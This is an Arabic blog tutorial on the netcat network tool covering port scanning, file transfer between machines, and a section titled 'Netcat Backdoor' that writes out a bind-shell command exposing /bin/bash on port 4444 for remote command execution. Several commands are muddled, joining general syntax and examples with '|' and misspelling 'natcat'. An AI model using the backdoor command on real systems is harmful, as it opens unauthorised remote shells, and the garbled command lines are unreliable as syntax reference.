أخر الاخبار

تعلم إستخدام أداة netcat على لينكس

احتراف اداة netcat

إستخدام أداة NetCat

أداة Netcat هي أداة متعددة الإستخدامات بشكل رائع أُطلِقَ عليها إسم "سكين الجيش السويسري. للقراصنة", هي خدمة شبكات كمبيوتر للقراءة و الكتابة, و تقوم في الشبكة بالإرسال و الإستقبال بإستخدام بروتوكولات TCP و UDP.

Netcat هي أداة سطر الأوامر في نظام التشغيل لينكس تستخدم للاتصال بمنافذ TCP / UDP وإرسال واستقبال البيانات عبر الشبكة. يمكن استخدام Netcat لإنشاء اتصالات شبكية بين جهازين وتبادل البيانات بينهما. يمكن استخدامها لأغراض مختلفة مثل اختبار الشبكة والتحقق من الاتصالات وإدارة الشبكة والأمان. يمكن استخدام Netcat في العديد من السيناريوهات المختلفة، مثل تحويل البيانات وإدارة العمليات عن بعد وإجراء اختبارات الاختراق والعثور على ثغرات الأمان.

يمكن استخدام Netcat في العديد من السيناريوهات المختلفة، مثل تحويل البيانات وإدارة العمليات عن بعد وإجراء اختبارات الاختراق والعثور على ثغرات الأمان. بالإضافة إلى ذلك، يمكن استخدام Netcat لإنشاء اتصالات TCP / UDP وإرسال واستقبال البيانات بين الأجهزة المختلفة، وتمكين المستخدمين من استخدامها لإنشاء خوادم بروتوكولات التراسل الفوري وخوادم الويب والخوادم الأخرى.

يمكن استخدام Netcat بسهولة عن طريق إدخال الأوامر المناسبة في سطر الأوامر. ولأنها أداة قوية ومتعددة الاستخدامات، فإنها تتطلب بعض المعرفة الأساسية في استخدام سطر الأوامر في نظام لينكس. يمكن العثور على العديد من الدروس والمصادر عبر الإنترنت التي تشرح كيفية استخدام Netcat والحصول على أقصى استفادة منها.

نت كات Netcat لهذه الأداة العديد من الإستخدامات المُهمة و الخطيرة و نستطيع إستخدامها في كثير من الأمور فهي تقوم بإرسال و إستقبال عبر. بروتوكولات TCP & UDP و تُعَد هذه الأداة من أهم ادوات مختبرين الإختراق TOP 10 Network Security حيث يُمكنك معرفة المنافذ المفتوحة داخل machine لكنها أضعف بكثير من أداه Nmap.

استخدامات أداة netcat لينكس

يمكن استخدام أداة netcat لينكس في العديد من الأغراض والسيناريوهات، من بينها:

1- إنشاء اتصالات TCP / UDP وإرسال واستقبال البيانات بين الأجهزة المختلفة.

2- إنشاء خوادم بروتوكولات التراسل الفوري وخوادم الويب والخوادم الأخرى.

3- تحويل البيانات بين أجهزة الكمبيوتر المختلفة.

4- إدارة العمليات عن بعد.

5- إجراء اختبارات الاختراق والعثور على ثغرات الأمان.

6- تشغيل أدوات أخرى عن بعد، مثل نظام الشل البعيد (SSH) وبروتوكول نقل الملفات (FTP).

7- استخدامها في البرمجة وإنشاء التطبيقات.

علاوة على ذلك، يمكن استخدام Netcat لأغراض أمنية مثل فحص الجدران النارية وتحديد المنافذ المفتوحة وغير المحمية في الشبكة، واستخدامها في العمليات الأمنية الأخرى مثل العثور على الثغرات وإجراء تحليلات أمنية. يعتبر Netcat أداة قوية ومتعددة الاستخدامات، ويتطلب استخدامها بعض المعرفة الأساسية في استخدام سطر الأوامر في نظام لينكس.

الميزات الرئيسية لأداة Netcat

  • الإتصالات الصادرة و الداخلة TCP أو UDP من و إلى المنافذ.
  • فحص كامل/عكسي لنظام DNS مع التحذيرات المناسبة.
  • القُدرة على إستخدام أي منفذ مصدر محلي.
  • القدرة على إستخدام أي عنوان مصدر شبكة مكون محلياً.
  • قدرات مسح المنافذ المدمجة مع التوزيع العشوائي.
  • إمكانية توجيه مصدر فضفاض مضمنة.
  • يمكن قراءة وسيطات سطر الأوامر من الإدخال القياسي.
  • إمكانية إختيارية للسماح لخدمة برامج أخرى بإنشاء إتصالات.

الهدف من استخدام اداة netcat لينكس

الهدف الرئيسي من استخدام أداة Netcat في نظام لينكس هو تمكين المستخدمين من إنشاء اتصالات شبكية بين الأجهزة المختلفة وتبادل البيانات بينها. وبالتالي، يوفر Netcat أسلوبًا فعالًا وسهلًا لإدارة الشبكات وتحسين أمانها واختبارها.

بالإضافة إلى ذلك، يمكن استخدام Netcat في العديد من الأغراض المختلفة، مثل إدارة العمليات عن بعد وإجراء اختبارات الاختراق وتحويل البيانات وإنشاء خوادم الويب وغيرها من الخدمات. ولذلك، تعتبر Netcat أداة قوية ومتعددة الاستخدامات، ويمكن استخدامها في مجالات عديدة، مثل الشبكات والأمن والبرمجة والتطبيقات وغيرها.

وبما أن Netcat أداة قوية ومتعددة الاستخدامات، فإن الهدف الأساسي من استخدامها هو تحسين الإنتاجية وتسهيل العمليات على المستخدمين، بالإضافة إلى تحسين الأمان والاستقرار في الشبكات والأنظمة المختلفة.

فحص المنافذ المفتوحة في السيرفر

فحص المنافذ (  Netcat Machine Port Scan ) الشكل العام للأمر لعمل هذه الأداة و سوف أقوم بتجريبها على الجهاز الخاص بي في الشبكة و سيكون الأمر بالشكل الآتي

netcat -v -w5 IP Address -z Port Range | netcat -v -w1 192.168.1.3 10-100

البراهين Arguments التي قُمنا بإستخدامها

  1. الأول v - : لجعل الأداه تعمل بشكل Verbose Mode لرؤية ماذا يحدث خلف الكواليس و الإخراج output و رؤية المنافذ المفتوحة على الشاشة.
  2. الثاني w - : لتحديد Time Out لكل إتصال و في حالتنا قُمنا بتحديد 5 ثواني فقط.
  3. الثالث z - : نستخدم هذا الـ Argument في فحص المنافذ و كما يُمكننا فحص أكثر من مجموعة منافذ و سيكون الشكل كما يلي

natcat -v -w5 192.168.1.3 -z 1-50 100-300

نقل الملفات بين جهازين بواسطة Netcat

نقل الملفات ( Netcat Transfer Files Between Two Machine ) من مميزات أداة netcat أنها تستطيع نقل البيانات بين جهازين كما يُمكن نقل أي نوع من أنواع الملفات.

netcat -l -v -p 4444 <filename | netcat -l -v -p 4444 <nusurtech.text

المعطيات المستخدمة

  1. الـ l- إختصاراً للمصطلح listening و تعني أن أجعل الجهاز قابل للإتصال من جهة أخرى, هُنا تكون في وضع التنصت على هذا المنفذ.
  2. الـ v- كما قلنا في الأعلى تعمل الأداة في وضع Verbose Mode لإخراج الأشياء التي تحصل خلف الكواليس output على الشاشة.
  3. الـ p- تحديد منفذ الإتصال المطلوب.
  4. الـ >- أما بالنسبة لهذه الإشارة تقوم بإعادة توجيه البيانات data المطلوبة و نستخدمها في نقل الملفات.

netcat -l -v -p 4444 <nusurtech.text

في المثال السابق قُمنا بإستخدام أداة netcat في نقل ملف بإسم nusurtech.text و قُمنا بإستخدام l لوضع التنصت listening و v لوضع verbose mode و p لتحديد. منفذ الإتصال المطلوب و > لتوجيه الداتا من الجهاز و معنى هذا أي شخص سيقوم بالإتصال سيقوم بتحميل هذا الملف.

المستقبل recev

netcat -v -n 192.168.1.3 4444 > nusurtech.text

و هُنا قُمنا بإستقبال الملف بعكس الإشارة الأُخرى < بالإضافة إلى Argument (n) و هنا لا نريده أن يبحث عن dns حتى لا يأخذ وقت في الإتصال.

Netcat Backdoor

يُعتَبَر خطر إستخدام Netcat هو backdoor حيث تتميز تلك الأداة في إرسال البيانات لبرامج التنفيذ على الحاسوب مثل cmd.exe في نظام الويندوز. و /bin/bash في نظام لينكس مما يجعلك تستطيع تنفيذ أوامر في النظام بشكل كامل و تستطيع عمل Remote Shell على الحاسوب.

netcat -l -v -n -p 4444 -e /bin/bash

الـ e- تعني filename execute التي من خلالها تستطيع exec ملف مثل cmd.exe أو /bin/bash و سنقوم بالإتصال عليه من خلال هذا الأمر.

netcat -v -n 192.168.1.3 4444

و نستطيع الآن تنفيذ الأوامر على السيرفر أو machine.

لأداة Netcat إختصارات مثل أي أداة اخرى و يُمكن كتابة الإختصار بالشكل

nc -lvnp 4444 | nc -vn 192.168.1.3 444



محمد الصادق عثمان
بواسطة : محمد الصادق عثمان
محمد الصادق محمد عثمان طالب جامعي في جامعة السودان للعلوم والتكنلوجيا
تعليقات




    حجم الخط
    +
    16
    -
    تباعد السطور
    +
    2
    -